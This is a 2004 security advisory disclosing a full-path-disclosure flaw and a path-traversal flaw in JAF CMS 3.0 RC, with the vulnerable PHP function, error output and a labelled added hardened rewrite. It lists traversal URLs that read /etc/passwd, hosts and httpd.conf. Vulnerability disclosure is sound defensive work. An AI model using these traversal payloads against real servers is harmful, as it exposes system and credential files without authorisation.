Echo Security Advisory 2004.8

2004-11-10T00:00:00
ID PACKETSTORM:34980
Type packetstorm
Reporter y3dips
Modified 2004-11-10T00:00:00

Description

ECHO_ADV_08$2004  
  
---------------------------------------------------------------------------  
Vulnerabilities in JAF CMS  
---------------------------------------------------------------------------  
  
Author: y3dips  
Date: November, 4th 2004  
Location: Indonesia, Jakarta  
Web: http://echo.or.id/adv/adv08-y3dips-2004.txt  
  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
JAF CMS - ...just another flat file CMS, is a Content Management System (CMS)  
consisting of a powerful set of PHP scripts that allow you to maintain a personal  
home page. There is no need for a database. The pages are stored in simple flat  
files. I've coded this script because I realized that it's hard to find a server  
(especially free space) offering PHP with database support already.  
  
Created by Salim "ph03y3nk"  
Version affected: 3.0 Release Candidate (not tested on other versions)  
Mail Contact : ph03y3nk@users.sourceforge.net  
URL: http://jaf-cms.sourceforge.net/  
  
---------------------------------------------------------------------------  
  
Vulnerabilities:  
~~~~~~~~~~~~~~~~  
  
A. Full path disclosure:  
  
A remote user can request the script in a way that makes PHP display an error  
message revealing the installation path. The resulting error message discloses  
potentially sensitive installation path information to the remote attacker.  
  
  
See the following function in config.php:  
  
---snip---  
  
function displaycontent() {  
    global $jaf;  
    // $jaf['show'] holds the page name taken from the ?show= request parameter  
    // and is used unchecked to build the path under data/ (or news/)  
    if(file_exists("data/".$jaf['show'])) {  
        require_once ("data/".$jaf['show']);  
        $filemod = filemtime("data/".$jaf['show']);  
        $filemodtime = date("F j, Y", $filemod);  
        echo "This page last updated on : <strong>$filemodtime</strong>";  
    }  
    else {  
        if(file_exists("news/".$jaf['show'])) {  
            require_once ("news/".$jaf['show']);  
        }  
        else {  
            echo "<p align='center'><img src='images/403-error.gif'><br /><big>  
<strong>Can't find the requested page, Sorry!!</strong></big></p>";  
        }  
    }  
}  
  
---snip---  
  
In that function we can see that if we supply the name of a page that does not  
exist in the "data/" (or "news/") directory, we get the error message defined in  
the script: "Can't find the requested page, Sorry!!"  
  
But what if we don't supply anything? Bummm ... we get a PHP error message that  
displays the installation path: file_exists("data/") is true for the directory  
itself, so the script goes on to require_once a directory, which fails.  
  
PoC:  
  
http://localhost/jaf/index.php?show=  
  
which produces the following error:  
  
Warning: displaycontent(data/): failed to open stream: Success in  
/var/www/html/jaf/config.php on line 129  
  
Fatal error: displaycontent(): Failed opening required 'data/'  
(include_path='.:/usr/share/pear') in /var/www/html/jaf/config.php on line 129  
  
  
  
B. Path Traversal  
  
config.php is also vulnerable to a basic path traversal attack, which uses the  
"../" character sequence to alter the location of the resource requested in the  
URL. Consequently, the response can reveal the contents of arbitrary readable  
files, because the included file is rendered as text.  
  
Exploit code:  
  
http://localhost/jaf/index.php?show=../../../../../../../etc/passwd  
http://localhost/jaf/index.php?show=../../../../../../../etc/hosts  
http://localhost/jaf/index.php?show=../../../../../../../etc/httpd/conf/httpd.conf  
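The following hardened rewrite of displaycontent() is an added example written for this page; it is not the vendor's actual fix and not code from the advisory. It assumes, as in the snippet above, that $jaf['show'] comes straight from the ?show= request parameter and that pages live in data/ and news/ next to config.php; the helper name resolve_page_path is an invention. It closes both issues at once: an empty name (A) and a traversal sequence (B) are rejected before any filesystem call, and every rejection produces the same generic message rather than a PHP warning that carries the installation path.

```php
<?php
// Added example (not the JAF CMS vendor's fix): hardened page lookup for the
// ?show= parameter. Assumes pages live in data/ and news/ beside this file.

// Returns the real path of the requested page, or null if the name is not
// acceptable. Nothing is touched on disk until the name has been validated.
function resolve_page_path($show)
{
    // Case A: an empty name turned into the bare path "data/", which
    // file_exists() accepted and require_once() then failed on with a warning.
    if (!is_string($show) || $show === '') {
        return null;
    }
    // Allow only a plain file name: letters, digits, dot, dash, underscore,
    // not starting with a dot. This excludes "/", "\" and NUL bytes (case B),
    // and the explicit ".." check blocks any parent-directory sequence.
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$/', $show)
        || strpos($show, '..') !== false) {
        return null;
    }
    foreach (array('data', 'news') as $dir) {
        $base = realpath(__DIR__ . '/' . $dir);
        $candidate = realpath($base . '/' . $show);
        // realpath() is false for a missing file. As defence in depth, also
        // confirm the resolved path is still inside the intended directory
        // and is a regular file, not a directory or a symlink target elsewhere.
        if ($base !== false && $candidate !== false
            && strpos($candidate, $base . DIRECTORY_SEPARATOR) === 0
            && is_file($candidate)) {
            return $candidate;
        }
    }
    return null;
}

function displaycontent()
{
    global $jaf;
    $path = resolve_page_path(isset($jaf['show']) ? $jaf['show'] : '');
    if ($path === null) {
        // One generic message for empty, traversal and unknown names, so the
        // response never reveals the filesystem layout.
        echo "<p align='center'><strong>Can't find the requested page, Sorry!!</strong></p>";
        return;
    }
    require_once $path;
    // Keep the original "last updated" footer for pages served from data/.
    if (dirname($path) === realpath(__DIR__ . '/data')) {
        $filemodtime = date("F j, Y", filemtime($path));
        echo "This page last updated on : <strong>"
            . htmlspecialchars($filemodtime) . "</strong>";
    }
}
```

Independently of the code change, setting display_errors to Off in php.ini (and logging errors to a file instead) stops any remaining PHP warning from reaching the browser, which is the generic mitigation for the path disclosure in section A.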
  
  
--------------------------------------------------------------------------  
  
The fix:  
~~~~~~~~  
  
The vendor has already been contacted and has already fixed it; a new version  
will probably be released.  
  
------------------------- - -- --- -- - -  
Reported to vendor: 4-11-2004  
Vendor fixed the bug: 6-11-2004  
Advisory released to securityfocus.com: 9-11-2004  
  
---------------------------------------------------------------------------  
  
Disclaimer:  
~~~~~~~~~~~  
  
The advice, directions, instructions and scripts on security vulnerabilities  
in this advisory are for educational purposes; neither y3dips nor echo.or.id  
accepts responsibility for any damage or injury caused as a result of their use.  
  
---------------------------------------------------------------------------  
  
Shoutz:  
~~~~~~~  
  
~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff  
~ yudhax, biatch-x, lieur-euy  
~ newbie_hacker@yahoogroups.com ,  
~ #e-c-h-o & #aikmel @DALNET  
  
Greetz:  
~~~~~~~  
  
~ pho3y3nk , thx for "friendly" response. HOPE it would be a great CMS  
  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~~  
  
y3dips || echo|staff || y3dips(at)echo(dot)or(dot)id  
Homepage: http://y3dips.echo.or.id/  
  
-------------------------------- [ EOF ] ----------------------------------  